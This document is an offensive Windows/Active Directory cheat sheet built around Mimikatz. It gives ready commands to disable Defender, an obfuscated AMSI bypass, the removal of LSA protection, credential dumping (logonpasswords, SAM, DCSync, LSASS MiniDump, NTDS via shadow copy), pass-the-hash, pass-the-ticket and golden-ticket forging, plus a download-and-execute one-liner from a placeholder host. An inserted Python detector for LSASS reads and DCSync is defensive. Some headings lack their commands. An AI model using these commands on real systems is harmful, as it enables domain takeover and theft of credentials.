## Environment preparation

Run as administrator:

```powershell
Start-Process PowerShell_ISE -Verb RunAs
Add-MpPreference -ExclusionPath "C:\Temp"
Set-MpPreference -DisableRealtimeMonitoring $true
Import-Module C:\Temp\Invoke-Mimikatz.ps1
```
If Windows Defender cannot be disabled, use an AMSI bypass:

```powershell
S`eT-It`em ( ‘V’+’aR’ + ‘IA’ + (‘blE:1’+’q2') + (‘uZ’+’x’) ) ( [TYpE]( “{1}{0}”-F’F’,’rE’ ) ) ; ( Get-varI`A`BLE ( (‘1Q’+’2U’) +’zX’ ) -VaL ).”A`ss`Embly”.”GET`TY`Pe”(( “{6}{3}{1}{4}{2}{0}{5}” -f(‘Uti’+’l’),’A’,(‘Am’+’si’),(‘.Man’+’age’+’men’+’t.’),(‘u’+’to’+’mation.’),’s’,(‘Syst’+’em’) ) ).”g`etf`iElD”( ( “{0}{2}{1}” -f(‘a’+’msi’),’d’,(‘I’+’nitF’+’aile’) ),( “{2}{4}{0}{1}{3}” -f (‘Non’+’Publ’+’i’),’c’,’c,’ )).”sE`T`VaLUE”( ${n`ULl},${t`RuE} )
```
Or use a one-liner generated on amsi.fail.
## LSA protection bypass

If LSA protection is enabled, launching mimikatz fails with the following error:
```
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)
```
These protections can then be bypassed in two steps:
1. Load the mimidrv driver into memory:

```
mimikatz # !+
[*] 'mimidrv' service not present
[+] 'mimidrv' service successfully registered
[+] 'mimidrv' service ACL to everyone
[+] 'mimidrv' service started
mimikatz #
```
2. Remove the LSA protection from the lsass process:

```
mimikatz # !processprotect /process:lsass.exe /remove
Process : lsass.exe
PID 528 -> 00/00 [0-0-0]
```
## Dumping credentials

Basic method:

```powershell
Invoke-Mimikatz -Command '"token::elevate" "privilege::debug" "sekurlsa::logonpasswords"'
```
Dump the Credential Manager:

```powershell
Invoke-Mimikatz -Command '"vault::cred /patch"'
Invoke-Mimikatz -Command '"sekurlsa::credman"'
```
Other modules:

```powershell
Invoke-Mimikatz -Command '"lsadump::sam"'
Invoke-Mimikatz -Command '"lsadump::cache"'
```
## Pass-the-hash

```powershell
Invoke-Mimikatz -Command '"sekurlsa::pth /user:administrator /domain:corp.local /ntlm:<NTLM_HASH> /run:powershell_ise.exe"'
```
## Pass-the-ticket

Export tickets:

```powershell
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
```
Inject a ticket:

```powershell
Invoke-Mimikatz -Command '"kerberos::ptt .\ticket.kirbi"'
```
View or clear tickets:
## Remote credential dumping

```powershell
Invoke-Command -ScriptBlock {Set-MpPreference -DisableRealtimeMonitoring $true} -ComputerName TargetHost
Invoke-Mimikatz -DumpCreds -ComputerName TargetHost
```
## DCSync attack

Dump the krbtgt hash:

```powershell
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:corp.local /user:corp\\krbtgt"'
```
Dump all domain hashes:

```powershell
Invoke-Mimikatz -Command '"token::elevate" "privilege::debug" "lsadump::dcsync /domain:test.local /all /csv"' | Export-Csv .\AllHashes.csv
```
## Golden ticket forging

```powershell
Invoke-Mimikatz -Command '"kerberos::golden /domain:corp.local /sid:S-1-5-21-XXXX /krbtgt:<hash> /user:Administrator /id:500 /ptt"'
```
To save and reuse the ticket later:

```
kerberos::golden /ticket:golden.kirbi
kerberos::ptt golden.kirbi
```
## Trust escalation via golden ticket

```powershell
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:child.local /sid:<child_sid> /sids:<parent_sid>-519 /krbtgt:<hash> /ticket:trust_tkt.kirbi"'
Invoke-Mimikatz -Command '"kerberos::ptt trust_tkt.kirbi"'
```
## MiniDump LSASS without pointing Mimikatz at LSASS directly

```
rundll32.exe C:\windows\system32\comsvcs.dll, MiniDump <LSASS_PID> C:\Temp\lsass.dmp full
```
Then in Mimikatz:

```
sekurlsa::minidump C:\Temp\lsass.dmp
sekurlsa::logonpasswords
```
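Added here as a defender-side example (not part of the original cheat sheet): a small Python detector run over constructed event lines, flagging the two activities described above, a handle opened on lsass.exe with memory-read access (Sysmon Event ID 10, as produced by the LSASS dump) and a Security Event ID 4662 requesting AD replication rights from an account that is not a domain controller (DCSync). The flattened key=value field layout, the `DC01$` account and all sample lines are constructed assumptions.

```python
import re

# Constructed sample events (not real telemetry) flattened to key=value lines:
# Sysmon Event ID 10 (ProcessAccess) and Security Event ID 4662 (object operation).
SAMPLE_EVENTS = [
    "EventID=10 SourceImage=C:\\Windows\\System32\\svchost.exe TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1000",
    "EventID=10 SourceImage=C:\\Windows\\System32\\rundll32.exe TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1FFFFF",
    "EventID=10 SourceImage=C:\\Temp\\powershell_ise.exe TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1010",
    "EventID=4662 SubjectUserName=DC01$ ObjectType=domainDNS Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662 SubjectUserName=jdoe ObjectType=domainDNS Properties={1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
]

# Control access rights that AD replication (and therefore DCSync) requires.
DS_REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
}
PROCESS_VM_READ = 0x0010  # reading another process's memory needs this right

def parse_event(line):
    """Turn a flattened 'Key=Value Key=Value' line into a dict."""
    return dict(re.findall(r"(\w+)=(\S+)", line))

def is_lsass_read(ev):
    """Sysmon 10: a handle on lsass.exe that allows reading its memory."""
    if ev.get("EventID") != "10":
        return False
    if not ev.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        return False
    # Dump tooling needs PROCESS_VM_READ (seen in masks such as 0x1010 or 0x1FFFFF).
    return bool(int(ev.get("GrantedAccess", "0"), 16) & PROCESS_VM_READ)

def is_dcsync(ev, dc_accounts):
    """4662 with replication rights requested by an account that is not a DC."""
    if ev.get("EventID") != "4662":
        return False
    guid = ev.get("Properties", "").strip("{}").lower()
    return guid in DS_REPLICATION_GUIDS and ev.get("SubjectUserName") not in dc_accounts

def find_alerts(lines, dc_accounts=frozenset({"DC01$"})):
    """Return (alert_kind, actor) tuples for every suspicious event line."""
    alerts = []
    for ev in map(parse_event, lines):
        if is_lsass_read(ev):
            alerts.append(("lsass-read", ev["SourceImage"]))
        elif is_dcsync(ev, dc_accounts):
            alerts.append(("dcsync", ev["SubjectUserName"]))
    return alerts

if __name__ == "__main__":
    print(find_alerts(SAMPLE_EVENTS))
```

The DC allow-list keeps legitimate replication between domain controllers quiet; in production it would be populated from the domain's DC list rather than hard-coded.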
## Check LSA protection status

```
reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL
```

If the value is **0x1**, protection is enabled.
## Obfuscated Invoke-Mimikatz for AV evasion

Download and run:

```powershell
IEX (New-Object Net.WebClient).DownloadString('http://<yourhost>/Invoke-Mimikatz.ps1')
```
Then call the commands in an obfuscated way:

```powershell
Invoke-Mimikatz -Command ([string]::Join(' ', @('"privilege::debug"', '"sekurlsa::logonpasswords"')))
```
## Dump credentials via Volume Shadow Copy

Create a shadow copy:

```
wmic shadowcopy call create Volume='C:\'
```
Find available shadow copies:
Copy NTDS and SYSTEM:

```
copy "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyX\Windows\NTDS\ntds.dit" C:\Temp\ntds.dit
copy "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyX\Windows\System32\config\SYSTEM" C:\Temp\SYSTEM
```
Parse them with impacket:

```
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
```
## Related tools

- SafetyKatz: obfuscated Mimikatz variant designed to bypass modern EDR solutions.
- Rubeus: powerful Kerberos abuse toolkit for ticket extraction, overpass-the-hash, and more.